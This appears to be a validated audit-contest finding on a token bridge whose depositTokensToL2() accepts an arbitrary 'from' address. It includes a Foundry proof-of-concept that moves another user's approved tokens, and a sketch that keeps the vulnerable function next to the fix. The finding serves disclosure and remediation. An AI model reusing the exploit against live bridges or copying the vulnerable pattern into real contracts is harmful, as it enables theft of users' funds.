Submission Details
Severity: high
Valid

Attacker can remove tokens from users up to the approved allowance

Summary

All tokens that have been approved for spending by the bridge are at risk.

Vulnerability Details

The depositTokensToL2() function takes the source address as a parameter (address from) and passes it to safeTransferFrom, rather than using msg.sender.

Impact

A malicious user can move tokens out of other users' wallets wherever those users have approved the bridge. Unapproved actors can therefore move users' funds to the vault, which puts those funds at risk in the event of an exploit on the bridge.

POC

    function testCanUseOthersApprovals() public {
        // setup - user approves the bridge to spend their tokens
        uint256 depositAmount = 1e18;
        address user2InL2 = makeAddr("userInL2");
        vm.startPrank(user);
        token.approve(address(tokenBridge), depositAmount);
        vm.stopPrank();
        uint256 userInitialBalance = token.balanceOf(address(user));

        // setup - create user 2, who never received any approval from user
        address user2 = makeAddr("user2");

        // user 2 deposits from user 1's balance by passing user as `from`
        vm.startPrank(user2);
        tokenBridge.depositTokensToL2(user, user2InL2, depositAmount);
        vm.stopPrank();

        // user's balance dropped even though user never called the bridge
        uint256 userPostBalance = token.balanceOf(address(user));
        assert(userPostBalance < userInitialBalance);
        console.log("USER LOSS = ", (userInitialBalance - userPostBalance));
    }

Tools Used

Manual review.

Recommendations

Remove the address from parameter from depositTokensToL2() and pass msg.sender to safeTransferFrom instead.
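
The recommended change, shown as an added example next to the vulnerable pattern (this is not the audited contract's code). BridgeSketch, IERC20Min, the Deposit event, the constructor and the function name depositTokensToL2Vulnerable are assumptions made for illustration, and a plain transferFrom with a return-value check stands in for safeTransferFrom so the file compiles without external libraries.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Minimal ERC-20 surface needed for the example (assumed interface name).
interface IERC20Min {
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// Hypothetical bridge reduced to the deposit path discussed in the finding.
contract BridgeSketch {
    IERC20Min public immutable token;
    address public immutable vault;

    // Assumed event; it only gives l2Recipient a visible use in this sketch.
    event Deposit(address from, address l2Recipient, uint256 amount);

    constructor(IERC20Min _token, address _vault) {
        token = _token;
        vault = _vault;
    }

    // VULNERABLE pattern: the caller chooses `from`, so any account can spend
    // an allowance that a different user granted to the bridge.
    function depositTokensToL2Vulnerable(address from, address l2Recipient, uint256 amount) external {
        require(token.transferFrom(from, vault, amount), "transfer failed");
        emit Deposit(from, l2Recipient, amount);
    }

    // FIXED pattern: no `from` parameter. Tokens are pulled only from
    // msg.sender, so only the caller's own allowance can be consumed.
    function depositTokensToL2(address l2Recipient, uint256 amount) external {
        require(token.transferFrom(msg.sender, vault, amount), "transfer failed");
        emit Deposit(msg.sender, l2Recipient, amount);
    }
}
```

With the fixed signature, the PoC's call no longer compiles as written, and a call from user2 can only draw on user2's own balance and allowance.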

Updates

Lead Judging Commences

0xnevi Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

depositTokensToL2(): arbitrary from address
